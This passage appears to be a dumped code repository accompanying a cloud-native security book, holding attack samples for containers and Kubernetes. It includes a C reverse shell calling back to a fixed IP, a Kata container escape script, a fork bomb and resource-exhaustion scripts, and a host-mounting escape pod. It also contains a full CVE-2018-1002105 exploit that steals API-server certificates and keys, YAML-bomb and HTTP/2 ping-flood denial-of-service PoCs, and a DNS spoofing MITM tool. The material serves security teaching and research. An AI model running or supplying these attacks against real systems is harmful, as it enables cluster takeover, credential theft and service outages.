virtioBlkCCWStorageHandler,\n\tdriverMmioBlkType:   virtioMmioBlkStorageHandler,\n\tdriverSCSIType:      virtioSCSIStorageHandler,\n\tdriverEphemeralType: ephemeralStorageHandler,\n\tdriverLocalType:     localStorageHandler,\n}\n\nfunc ephemeralStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\ts.Lock()\n\tdefer s.Unlock()\n\tnewStorage := s.setSandboxStorage(storage.MountPoint)\n\n\tif newStorage {\n\t\tvar err error\n\t\tif err = os.MkdirAll(storage.MountPoint, os.ModePerm); err == nil {\n\t\t\t_, err = commonStorageHandler(storage)\n\t\t}\n\t\treturn \"\", err\n\t}\n\treturn \"\", nil\n}\n\nfunc localStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\ts.Lock()\n\tdefer s.Unlock()\n\tnewStorage := s.setSandboxStorage(storage.MountPoint)\n\tif newStorage {\n\n\t\t// Extract and parse the mode out of the storage options.\n\t\t// Default to os.ModePerm.\n\t\topts := parseOptions(storage.Options)\n\t\tmode := os.ModePerm\n\t\tif val, ok := opts[\"mode\"]; ok {\n\t\t\tm, err := strconv.ParseUint(val, 8, 32)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t\tmode = os.FileMode(m)\n\t\t}\n\n\t\tif err := os.MkdirAll(storage.MountPoint, mode); err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\t// We chmod the permissions for the mount point, as we can't rely on os.MkdirAll to set the\n\t\t// desired permissions.\n\t\treturn \"\", os.Chmod(storage.MountPoint, mode)\n\t}\n\treturn \"\", nil\n}\n\n// virtio9pStorageHandler handles the storage for 9p driver.\nfunc virtio9pStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\treturn commonStorageHandler(storage)\n}\n\n// virtioMmioBlkStorageHandler handles the storage for mmio blk driver.\nfunc virtioMmioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\t//The source path is VmPath\n\treturn commonStorageHandler(storage)\n}\n\n// virtioBlkCCWStorageHandler handles the storage for blk ccw driver.\nfunc virtioBlkCCWStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\tdevPath, err := getBlkCCWDevPath(s, storage.Source)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif devPath == \"\" {\n\t\treturn \"\", grpcStatus.Errorf(codes.InvalidArgument,\n\t\t\t\"Storage source is empty\")\n\t}\n\tstorage.Source = devPath\n\treturn commonStorageHandler(storage)\n}\n\n// virtioFSStorageHandler handles the storage for virtio-fs.\nfunc virtioFSStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\treturn commonStorageHandler(storage)\n}\n\n// virtioBlkStorageHandler handles the storage for blk driver.\nfunc virtioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\n\t// If hot-plugged, get the device node path based on the PCI address else\n\t// use the virt path provided in Storage Source\n\tif strings.HasPrefix(storage.Source, \"/dev\") {\n\n\t\tFileInfo, err := os.Stat(storage.Source)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\t// Make sure the virt path is valid\n\t\tif FileInfo.Mode()&os.ModeDevice == 0 {\n\t\t\treturn \"\", fmt.Errorf(\"invalid device %s\", storage.Source)\n\t\t}\n\n\t} else {\n\t\tdevPath, err := getPCIDeviceName(s, storage.Source)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tstorage.Source = devPath\n\t}\n\n\treturn commonStorageHandler(storage)\n}\n\n// virtioSCSIStorageHandler handles the storage for scsi driver.\nfunc virtioSCSIStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) {\n\t// Retrieve the device path from SCSI address.\n\tdevPath, err := getSCSIDevPath(s, storage.Source)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tstorage.Source = devPath\n\n\treturn commonStorageHandler(storage)\n}\n\nfunc commonStorageHandler(storage pb.Storage) (string, error) {\n\t// Mount the storage device.\n\tif err := mountStorage(storage); err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn storage.MountPoint, nil\n}\n\n// mountStorage performs the mount described by the storage structure.\nfunc mountStorage(storage pb.Storage) error {\n\tflags, options := parseMountFlagsAndOptions(storage.Options)\n\n\treturn mount(storage.Source, storage.MountPoint, storage.Fstype, flags, options)\n}\n\n// addStorages takes a list of storages passed by the caller, and perform the\n// associated operations such as waiting for the device to show up, and mount\n// it to a specific location, according to the type of handler chosen, and for\n// each storage.\nfunc addStorages(ctx context.Context, storages []*pb.Storage, s *sandbox) (mounts []string, err error) {\n\tspan, ctx := trace(ctx, \"mount\", \"addStorages\")\n\tspan.setTag(\"sandbox\", s.id)\n\tdefer span.finish()\n\n\tvar mountList []string\n\tvar storageList []string\n\n\tdefer func() {\n\t\tif err != nil {\n\t\t\ts.Lock()\n\t\t\tfor _, path := range storageList {\n\t\t\t\tif err := s.unsetAndRemoveSandboxStorage(path); err != nil {\n\t\t\t\t\tagentLog.WithFields(logrus.Fields{\n\t\t\t\t\t\t\"error\": err,\n\t\t\t\t\t\t\"path\":  path,\n\t\t\t\t\t}).Error(\"failed to roll back addStorages\")\n\t\t\t\t}\n\t\t\t}\n\t\t\ts.Unlock()\n\t\t}\n\t}()\n\n\tfor _, storage := range storages {\n\t\tif storage == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tdevHandler, ok := storageHandlerList[storage.Driver]\n\t\tif !ok {\n\t\t\treturn nil, grpcStatus.Errorf(codes.InvalidArgument,\n\t\t\t\t\"Unknown storage driver %q\", storage.Driver)\n\t\t}\n\n\t\t// Wrap the span around the handler call to avoid modifying\n\t\t// the handler interface but also to avoid having to add trace\n\t\t// code to each driver.\n\t\thandlerSpan, _ := trace(ctx, \"mount\", storage.Driver)\n\t\tmountPoint, err := devHandler(ctx, *storage, s)\n\t\thandlerSpan.finish()\n\n\t\tif _, ok := s.storages[storage.MountPoint]; ok {\n\t\t\tstorageList = append([]string{storage.MountPoint}, storageList...)\n\t\t}\n\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tif mountPoint != \"\" {\n\t\t\t// Prepend mount point to mount list.\n\t\t\tmountList = append([]string{mountPoint}, mountList...)\n\t\t}\n\t}\n\n\treturn mountList, nil\n}\n\n// getMountFSType returns the FS type corresponding to the passed mount point and\n// any error ecountered.\nfunc getMountFSType(mountPoint string) (string, error) {\n\tif mountPoint == \"\" {\n\t\treturn \"\", errors.Errorf(\"Invalid mount point '%s'\", mountPoint)\n\t}\n\n\tmountstats, err := os.Open(procMountStats)\n\tif err != nil {\n\t\treturn \"\", errors.Wrapf(err, \"Failed to open file '%s'\", procMountStats)\n\t}\n\tdefer mountstats.Close()\n\n\t// Refer to fs/proc_namespace.c:show_vfsstat() for\n\t// the file format.\n\tre := regexp.MustCompile(fmt.Sprintf(`device .+ mounted on %s with fstype (.+)`, mountPoint))\n\n\tscanner := bufio.NewScanner(mountstats)\n\tfor scanner.Scan() {\n\t\tline := scanner.Text()\n\t\tmatches := re.FindStringSubmatch(line)\n\t\tif len(matches) > 1 {\n\t\t\treturn matches[1], nil\n\t\t}\n\t}\n\n\tif err := scanner.Err(); err != nil {\n\t\treturn \"\", errors.Wrapf(err, \"Failed to parse proc mount stats file %s\", procMountStats)\n\t}\n\n\treturn \"\", errors.Errorf(\"Failed to find FS type for mount point '%s'\", mountPoint)\n}\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/evil_bin.c",
    "content": "/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */\n#include <stdio.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#define REMOTE_ADDR \"172.16.56.1\"\n#define REMOTE_PORT 10000\nint main(int argc, char *argv[])\n{\n    struct sockaddr_in sa;\n    int s;\n    sa.sin_family = AF_INET;\n    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);\n    sa.sin_port = htons(REMOTE_PORT);\n    s = socket(AF_INET, SOCK_STREAM, 0);\n    connect(s, (struct sockaddr *)&sa, sizeof(sa));\n    dup2(s, 0);\n    dup2(s, 1);\n    dup2(s, 2);\n    execve(\"/bin/bash\", 0, 0);\n    return 0;\n}\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/exploit.sh",
    "content": "#!/bin/bash\n\nset -e\n\n# warm up\necho \"[*] Running an Ubuntu container to warm up...\"\ndocker run --rm ubuntu uname -a\n\necho \"[*] Exploiting to escape kata...\"\n\necho \"[*] Running malicious container with kata on CLH...\"\ndocker run --rm --name stage1 kata-malware-image:latest\n\necho \"[+] Guest image file has been compromised\"\n\necho \"[*] Running malicious container with kata on CLH once again...\"\ndocker run --rm -d --name stage2 kata-malware-image:latest\n\necho \"[+] Done. Now you can wait for the reverse shell :)\"\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/get_kata_src.sh",
    "content": "#!/bin/bash\n\nmkdir -p $GOPATH/src/github.com/kata-containers/\ncd $GOPATH/src/github.com/kata-containers/\ngit clone https://github.com/kata-containers/agent\ncd agent\ngit checkout 1.10.0"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/install_kata.sh",
    "content": "#!/bin/bash\nset -e -x\n\n# 下载安装包（如果已经下载，此步可跳过）\n#wget https://github.com/kata-containers/runtime/releases/download/1.10.0/kata-static-1.10.0-x86_64.tar.xz\ntar xf kata-static-1.10.0-x86_64.tar.xz\nrm -rf /opt/kata\nmv ./opt/kata /opt\nrmdir ./opt\nrm -rf /etc/kata-containers\ncp -r /opt/kata/share/defaults/kata-containers /etc/\n# 使用Cloud Hypervisor作为虚拟机管理程序\nrm /etc/kata-containers/configuration.toml\nln -s /etc/kata-containers/configuration-clh.toml /etc/kata-containers/configuration.toml\n# 配置Docker\nmkdir -p /etc/docker/\ncat << EOF > /etc/docker/daemon.json\n{\n  \"runtimes\": {\n    \"kata-runtime\": {\n      \"path\": \"/opt/kata/bin/kata-runtime\"\n    },\n    \"kata-clh\": {\n      \"path\": \"/opt/kata/bin/kata-clh\"\n    },\n    \"kata-qemu\": {\n      \"path\": \"/opt/kata/bin/kata-qemu\"\n    }\n  },\n  \"registry-mirrors\": [\"https://docker.mirrors.ustc.edu.cn/\"]\n}\nEOF\nmkdir -p /etc/systemd/system/docker.service.d/\ncat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf\n[Service]\nExecStart=\nExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime\nEOF\n# 重载配置&重新启动Docker\nsystemctl daemon-reload && systemctl restart docker"
  },
  {
    "path": "code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_cpu.sh",
    "content": "#!/bin/bash\n\n# for Debian & Ubuntu\n# apt install -y stress\n\nstress -c 1000"
  },
  {
    "path": "code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_disk.sh",
    "content": "#!/bin/bash\n\n# for Debian & Ubuntu\n# apt install -y util-linux\n\nfallocate -l 9.4G ./bomb"
  },
  {
    "path": "code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_mem.sh",
    "content": "#!/bin/bash\n\n# for Debian & Ubuntu\n# apt install -y stress\n\nstress --vm-bytes 3300m --vm-keep -m 3"
  },
  {
    "path": "code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_pid.sh",
    "content": "#!/bin/bash\n\n:() { :|:& };:"
  },
  {
    "path": "code/0402-Kubernetes组件不安全配置/deploy_escape_pod_on_remote_host.sh",
    "content": "#!/bin/bash\n\ncat << EOF > escape.yaml\n# attacker.yaml\napiVersion: v1\nkind: Pod\nmetadata:\n  name: attacker\nspec:\n  containers:\n  - name: ubuntu\n    image: ubuntu:latest\n    imagePullPolicy: IfNotPresent\n    # Just spin & wait forever\n    command: [ \"/bin/bash\", \"-c\", \"--\" ]\n    args: [ \"while true; do sleep 30; done;\" ]\n    volumeMounts:\n    - name: escape-host\n      mountPath: /host-escape-door\n  volumes:\n    - name: escape-host\n      hostPath:\n        path: /\nEOF\n\nkubectl -s TARGET-IP:8080 apply -f escape.yaml\nsleep 8\nkubectl -s TARGET-IP:8080 exec -it attacker /bin/bash"
  },
  {
    "path": "code/0403-CVE-2018-1002105/attacker.yaml",
    "content": "# attacker.yaml\napiVersion: v1\nkind: Pod\nmetadata:\n  name: attacker\nspec:\n  containers:\n  - name: ubuntu\n    image: ubuntu:latest\n    imagePullPolicy: IfNotPresent\n    # Just spin & wait forever\n    command: [ \"/bin/bash\", \"-c\", \"--\" ]\n    args: [ \"while true; do sleep 30; done;\" ]\n    volumeMounts:\n    - name: escape-host\n      mountPath: /host-escape-door\n  volumes:\n    - name: escape-host\n      hostPath:\n        path: /\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/cve_2018_1002105_namespace.yaml",
    "content": "# cve_2018_1002105_namespace.yaml\napiVersion: v1\nkind: Namespace\nmetadata:\n  name: test\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/cve_2018_1002105_pod.yaml",
    "content": "# cve_2018_1002105_pod.yaml\napiVersion: v1\nkind: Pod\nmetadata:\n  name: test\n  namespace: test\nspec:\n  containers:\n  - name: ubuntu\n    image: ubuntu:latest\n    imagePullPolicy: IfNotPresent\n    # Just spin & wait forever\n    command: [ \"/bin/bash\", \"-c\", \"--\" ]\n    args: [ \"while true; do sleep 30; done;\" ]\n  serviceAccount: default\n  serviceAccountName: default\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/cve_2018_1002105_role.yaml",
    "content": "# cve_2018_1002105_role.yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: test\n  namespace: test\nrules:\n- apiGroups:\n  - \"\"\n  resources:\n  - pods\n  verbs:\n  - get\n  - list\n  - delete\n  - watch\n- apiGroups:\n  - \"\"\n  resources:\n  - pods/exec\n  verbs:\n  - create\n  - get\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/cve_2018_1002105_role_binding.yaml",
    "content": "# cve_2018_1002105_role_binding.yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  name: test\n  namespace: test\nroleRef:\n  apiGroup: rbac.authorization.k8s.io\n  kind: Role\n  name: test\nsubjects:\n- apiGroup: rbac.authorization.k8s.io\n  kind: Group\n  name: test\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/exploit.py",
    "content": "\"\"\"ExP for CVE-2018-1002105\nONLY USED FOR SECURITY RESEARCH\nILLEGAL USE IS **PROHIBITED**\n\"\"\"\n\nfrom secrets import base64, token_bytes\nimport sys\nimport argparse\nimport socket\nimport ssl\nfrom urllib import parse\nimport json\n\ntry:\n    from http_parser.parser import HttpParser\nexcept ImportError:\n    from http_parser.pyparser import HttpParser\n\ncontext = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\n\n# Args\nparser = argparse.ArgumentParser(description='ExP for CVE-2018-1002105.')\nrequired = parser.add_argument_group('required arguments')\nrequired.add_argument('--target', '-t', dest='host', type=str,\n                      help='API Server\\'s IP', required=True)\nrequired.add_argument('--port', '-p', dest='port', type=str,\n                      help='API Server\\'s port', required=True)\nrequired.add_argument('--bearer-token', '-b', dest='token', type=str,\n                      help='Bearer token for the low privileged user', required=True)\nrequired.add_argument('--namespace', '-n', dest='namespace', type=str,\n                      help='Namespace with method access',\n                      default='default', required=True)\nrequired.add_argument('--pod', '-P', dest='pod', type=str,\n                      required=True, help='Pod with method access')\nargs = parser.parse_args()\n\n# HTTP Gadgets\nhttp_delimiter = '\\r\\n'\nhost_header = f'Host: {args.host}:{args.port}'\nauth_header = f'Authorization: Bearer {args.token}'\nconn_header = 'Connection: upgrade'\nupgrade_header = 'Upgrade: websocket'\nagent_header = 'User-Agent: curl/7.64.1'\naccept_header = 'Accept: */*'\norigin_header = f'Origin: http://{args.host}:{args.port}'\nsec_key = base64.b64encode(token_bytes(20)).decode('utf-8')\nsec_websocket_key = f'Sec-WebSocket-Key: {sec_key}'\nsec_websocket_version = 'Sec-WebSocket-Version: 13'\n\n# secret targets\nca_crt = 'ca.crt'\nclient_crt = 'apiserver-kubelet-client.crt'\nclient_key = 'apiserver-kubelet-client.key'\n\n\ndef _get_http_body(byte_http):\n    p = HttpParser()\n    recved = len(byte_http)\n    p.execute(byte_http, recved)\n    return p.recv_body().decode('utf-8')\n\n\ndef _recv_all_once(ssock, length=4096):\n    res = b\"\"\n    incoming = True\n    while incoming:\n        try:\n            res += ssock.recv(length)\n        except socket.timeout:\n            if not res:\n                continue\n            else:\n                break\n    return res\n\n\ndef _try_to_get_privilege(ssock, namespace, pod):\n    payload1 = http_delimiter.join(\n        (f'GET /api/v1/namespaces/{namespace}/pods/{pod}/exec HTTP/1.1',\n         host_header,\n         auth_header,\n         upgrade_header,\n         conn_header))\n    payload1 += http_delimiter * 2\n    ssock.send(payload1.encode('utf-8'))\n\n\ndef _run_with_privilege(ssock, get_path):\n    payload = http_delimiter.join(\n        (f'GET {get_path} HTTP/1.1',\n         host_header,\n         auth_header,\n         conn_header,\n         upgrade_header,\n         origin_header,\n         sec_websocket_key,\n         sec_websocket_version))\n    payload += http_delimiter * 2\n    ssock.send(payload.encode('utf-8'))\n\n\ndef _match_or_exit(banner_bytes, resp, fail_message=\"[-] Failed.\"):\n    if banner_bytes in resp:\n        return\n    print(fail_message)\n    sys.exit(1)\n\n\ndef _get_secret(resp):\n    delimiter = b'-----'\n    start = resp.index(delimiter)\n    end = resp.rindex(delimiter)\n    return resp[start:end + len(delimiter)].decode('utf-8')\n\n\ndef _save_file(file_name, content):\n    with open(file_name, 'w') as f:\n        f.write(content)\n\n\ndef _steal_secret(api_server, secret_file, match_banner):\n    with socket.create_connection((args.host, int(args.port))) as sock:\n        with context.wrap_socket(sock, server_hostname=args.host) as ssock:\n            ssock.settimeout(1)\n            print('[*] Creating new privileged pipe...')\n            _try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)\n            resp = _recv_all_once(ssock)\n            _match_or_exit(b'stdin, stdout, stderr', resp)\n            print(f\"[*] Trying to steal {secret_file}...\")\n            cmd1 = parse.quote('/bin/cat')\n            cmd2 = parse.quote(f\"/etc/kubernetes/pki/{secret_file}\")\n            _run_with_privilege(\n                ssock,\n                f'/exec/kube-system/{api_server}/kube-apiserver?command={cmd1}&command={cmd2}&input=1&output=1&tty=0')\n            resp = _recv_all_once(ssock)\n            _match_or_exit(b'HTTP/1.1 101 Switching Protocols', resp)\n            _match_or_exit(match_banner, resp, fail_message=f'[-] Cannot find banner {match_banner}.')\n            print(f'[+] Got {secret_file}.')\n            secret_content = _get_secret(resp)\n            _save_file(secret_file, secret_content)\n            print(f'[+] Secret {secret_file} saved :)')\n\n\ndef main():\n    print(\"[*] Exploiting CVE-2018-1002105...\")\n    with socket.create_connection((args.host, int(args.port))) as sock:\n        with context.wrap_socket(sock, server_hostname=args.host) as ssock:\n            # step 1\n            ssock.settimeout(1)\n            print(\"[*] Checking vulnerable or not...\")\n            _try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)\n            resp = _recv_all_once(ssock)\n            _match_or_exit(\n                b'stdin, stdout, stderr',\n                resp,\n                fail_message='[-] Not vulnerable to CVE-2018-1002105.')\n            print(\"[+] Vulnerable to CVE-2018-1002105, continue.\")\n\n            # step 2\n            print(\"[*] Getting running pods list...\")\n            _run_with_privilege(ssock, '/runningpods/')\n            resp = _recv_all_once(ssock)\n            _match_or_exit(b'HTTP/1.1 200 OK', resp)\n            print(\"[+] Got running pods list.\")\n\n            pods_info = json.loads(_get_http_body(resp))\n            pods_list = [pod['metadata']['name'] for pod in pods_info['items']]\n            for pod in pods_list:\n                if pod.startswith('kube-apiserver'):\n                    api_server = pod\n                    break\n            else:\n                print(\"[-] Cannot find API Server.\")\n                sys.exit(1)\n            print(f\"[*] API Server is {api_server}.\")\n\n            # step 3\n            _steal_secret(\n                api_server=api_server,\n                secret_file=ca_crt,\n                match_banner=b'BEGIN CERTIFICATE')\n            _steal_secret(\n                api_server=api_server,\n                secret_file=client_crt,\n                match_banner=b'BEGIN CERTIFICATE')\n            _steal_secret(\n                api_server=api_server,\n                secret_file=client_key,\n                match_banner=b'BEGIN RSA PRIVATE KEY')\n\n    print('[+] Enjoy your trip :)')\n    cmd_try = f\"kubectl --server=https://{args.host}:{args.port}\" \\\n              f\" --certificate-authority={ca_crt}\" \\\n              f\" --client-certificate={client_crt}\" \\\n              f\" --client-key={client_key} get pods -n kube-system\"\n    print(cmd_try)\n\n\nif __name__ == \"__main__\":\n    main()\n"
  },
  {
    "path": "code/0403-CVE-2018-1002105/test-token.csv",
    "content": "password,test,test,test\n"
  },
  {
    "path": "code/0404-K8s拒绝服务攻击/CVE-2019-11253-poc.sh",
    "content": "#!/bin/bash\n\n# 查看Kubernetes版本\nkubectl version | grep Server\n# 开启通向API Server的代理\nkubectl proxy &\n# 创建一个恶意ConfigMap文件（n=9）\ncat << EOF > cve-2019-11253.yaml\napiVersion: v1\ndata:\n  a: &a [\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\"]\n  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]\n  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]\n  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]\n  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]\n  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]\n  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]\n  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]\n  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]\nkind: ConfigMap\nmetadata:\n  name: yaml-bomb\n  namespace: default\nEOF\n# 向API Server发出ConfigMap创建请求\ncurl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H \"Content-Type: application/yaml\" --data-binary @cve-2019-11253.yaml"
  },
  {
    "path": "code/0404-K8s拒绝服务攻击/CVE-2019-9512-poc.py",
    "content": "#!/usr/bin/python\n# cve-2019-9512.py\n\nimport ssl\nimport socket\nimport time\nimport sys\n\n\nclass PingFlood:\n    # HTTP/2 Magic头\n    PREAMBLE = b'PRI * HTTP/2.0\\r\\n\\r\\nSM\\r\\n\\r\\n'\n    # PING帧\n    PING_FRAME = b\"\\x00\\x00\\x08\" \\\n        b\"\\x06\" \\\n        b\"\\x00\" \\\n        b\"\\x00\\x00\\x00\\x00\" \\\n        b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\"\n    # WINDOW UPDATE帧\n    WINDOW_UPDATE_FRAME = b\"\\x00\\x00\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x3f\\xff\\x00\\x01\"\n    # SETTINGS帧\n    SETTINGS_FRAME = b\"\\x00\\x00\\x12\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x64\\x00\" \\\n        b\"\\x04\\x40\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\"\n    # SETTINGS响应帧\n    SETTINGS_ACK_FRAME = b\"\\x00\\x00\\x00\\x04\\x01\\x00\\x00\\x00\\x00\"\n    # HEADERS帧，请求/healthz\n    HEADERS_FRAME_healthz = b\"\\x00\\x00\\x29\\x01\\x05\\x00\\x00\\x00\\x01\\x82\\x04\\x86\\x62\\x72\\x8e\\x84\" \\\n        b\"\\xcf\\xef\\x87\\x41\\x8e\\x0b\\xe2\\x5c\\x2e\\x3c\\xb8\\x5f\\x5c\\x4d\\x8a\\xe3\" \\\n        b\"\\x8d\\x34\\xcf\\x7a\\x88\\x25\\xb6\\x50\\xc3\\xab\\xb8\\xd2\\xe1\\x53\\x03\\x2a\" \\\n        b\"\\x2f\\x2a\"\n\n    def __init__(self, ip, port=6443, socket_count=1000):\n        # 配置到Kubernetes API Server的TLS上下文\n        self._context = ssl.SSLContext(ssl.PROTOCOL_TLS)\n        self._context.check_hostname = False\n        self._context.load_cert_chain(certfile=\"./client_cert\", keyfile=\"./client_key_data\")\n        self._context.load_verify_locations(\"./certificate_authority_data\")\n        self._context.verify_mode = ssl.CERT_REQUIRED\n        # self._context.keylog_filename = \"/Users/rambo/Desktop/exp/keylog\"\n        # 协议协商\n        self._context.set_alpn_protocols(['h2', 'http/1.1'])\n\n        self._ip = ip\n        self._port = port\n        # 创建n个socket\n        self._sockets = [self.create_socket() for _ in range(socket_count)]\n\n    def create_socket(self):\n        try:\n            print(\"[*] Creating socket...\")\n            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            sock.settimeout(4)\n            # 应用配置的TLS上下文\n            ssock = self._context.wrap_socket(sock, server_side=False)\n            ssock.connect((self._ip, self._port))\n            # 首先发起正常的对/healthz接口的查询请求\n            ssock.send(self.PREAMBLE)\n            ssock.send(self.SETTINGS_FRAME)\n            ssock.send(self.HEADERS_FRAME_healthz)\n            ssock.send(self.SETTINGS_ACK_FRAME)\n            # 接收响应和回复\n            rmsg = ssock.recv(1024)\n            rmsg = ssock.recv(1024)\n            rmsg = ssock.recv(1024)\n            rmsg = ssock.recv(1024)\n            rmsg = ssock.recv(4096)\n            # 返回一个待用于攻击的socket\n            return ssock\n        except socket.error as se:\n            print(\"[-] Error: \" + str(se))\n            # 创建socket失败，则等待一会儿再次尝试创建\n            time.sleep(0.5)\n            return self.create_socket()\n\n    def attack(self):\n        print(\"[*] Flooding...\")\n        for s in self._sockets:\n            try:\n                # 发送PING帧，不读取响应帧\n                s.send(self.PING_FRAME)\n            except socket.error:\n                self._sockets.remove(s)\n                self._sockets.append(self.create_socket())\n\n\nif __name__ == \"__main__\":\n    dos = PingFlood(sys.argv[1], int(sys.argv[2]), int(sys.argv[3]))\n    dos.attack()"
  },
  {
    "path": "code/0405-云原生网络攻击/Dockerfile",
    "content": "FROM ubuntu:latest\n\nCOPY k8s_dns_mitm.py /poc.py\n\nRUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list\nRUN apt update && DEBIAN_FRONTEND=noninteractive apt install -y python3 python3-pip && apt clean\n\nRUN pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn\n\nRUN chmod u+x /poc.py\n\nENTRYPOINT [\"/bin/bash\", \"-c\", \"/poc.py example.com \"]"
  },
  {
    "path": "code/0405-云原生网络攻击/attacker.yaml",
    "content": "# attacker_pod\napiVersion: v1\nkind: Pod\nmetadata:\n  name: attacker\nspec:\n  containers:\n  - name: main\n    image: k8s_dns_mitm:1.0\n    imagePullPolicy: IfNotPresent"
  },
  {
    "path": "code/0405-云原生网络攻击/build_image.sh",
    "content": "#!/bin/bash\n\ndocker build -t k8s_dns_mitm:1.0 ."
  },
  {
    "path": "code/0405-云原生网络攻击/cleanup.sh",
    "content": "#!/bin/bash\n\nset -e -x\n\nkubectl delete pod victim attacker\n\nfor record in $(arp  | grep cni0 | awk '{print $1}'); do\n  arp -d \"$record\"\ndone\n"
  },
  {
    "path": "code/0405-云原生网络攻击/exploit.sh",
    "content": "#!/bin/bash\n\nset -e\n\necho \"[*] Pulling curl image...\"\ndocker pull curlimages/curl:latest\n\necho \"[*] Creating attacker and victim pods...\"\nkubectl apply -f attacker.yaml\nkubectl apply -f victim.yaml\n\necho \"[*] Waiting 20s for pods' creation...\"\nsleep 20\n\necho \"[*] Reading attacker's log...\"\nkubectl logs attacker\n\necho \"[*] Trying to curl http://example.com in victim...\"\nkubectl exec -it victim curl http://example.com"
  },
  {
    "path": "code/0405-云原生网络攻击/k8s_dns_mitm.py",
    "content": "#!/usr/bin/python3\n# issues about scapy with Pycharm:\n# https://stackoverflow.com/questions/45691654/unresolved-reference-with-scapy\n\nimport sys\nimport time\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom multiprocessing import Process\nfrom scapy.layers.inet import IP, UDP, Ether, ICMP\nfrom scapy.layers.l2 import ARP\nfrom scapy.sendrecv import srp1, srp, send, sendp, sniff, sr1\nfrom scapy.layers.dns import DNS, DNSQR, DNSRR\n\n\nclass S(BaseHTTPRequestHandler):\n    def _set_response(self):\n        self.send_response(200)\n        self.send_header('Content-type', 'text/html')\n        self.end_headers()\n\n    def do_GET(self):\n        self._set_response()\n        self.wfile.write(\"F4ke Website\\n\".encode('utf-8'))\n\n\nclass DnsProxy:\n    \"\"\" Handles DNS request packets, will forward them to real kube-dns, except for targeted domains. \"\"\"\n\n    def __init__(self, upstream_server, local_server_mac, local_server_ip,\n                 self_mac, self_ip, fake_domain, interface):\n        self.upstream_server = upstream_server\n        self.local_server_mac = local_server_mac\n        self.local_server_ip = local_server_ip\n        self.mac = self_mac\n        self.ip = self_ip\n        self.fake_domain = fake_domain\n        self.interface = interface\n\n    @staticmethod\n    def generate_response(request, ip=None, nx=None):\n        return DNS(id=request[DNS].id,\n                   aa=1,  # authoritative\n                   qr=1,  # a response\n                   rd=request[DNS].rd,  # copy recursion\n                   qdcount=request[DNS].qdcount,  # copy question count\n                   qd=request[DNS].qd,  # copy question itself\n                   ancount=1 if not nx else 0,  # we provide a single answer\n                   an=DNSRR(\n            rrname=request[DNS].qd.qname,\n            type='A',\n            ttl=1,\n            rdata=ip) if not nx else None,\n            rcode=0 if not nx else 3\n        )\n\n    @staticmethod\n    def is_local_domain(domain):\n        for tld in (\".local.\", \".internal.\"):\n            if domain.decode('ascii').endswith(tld):\n                return True\n\n    def forward(self, req_pkt, verbose):\n        # first contacting local dns 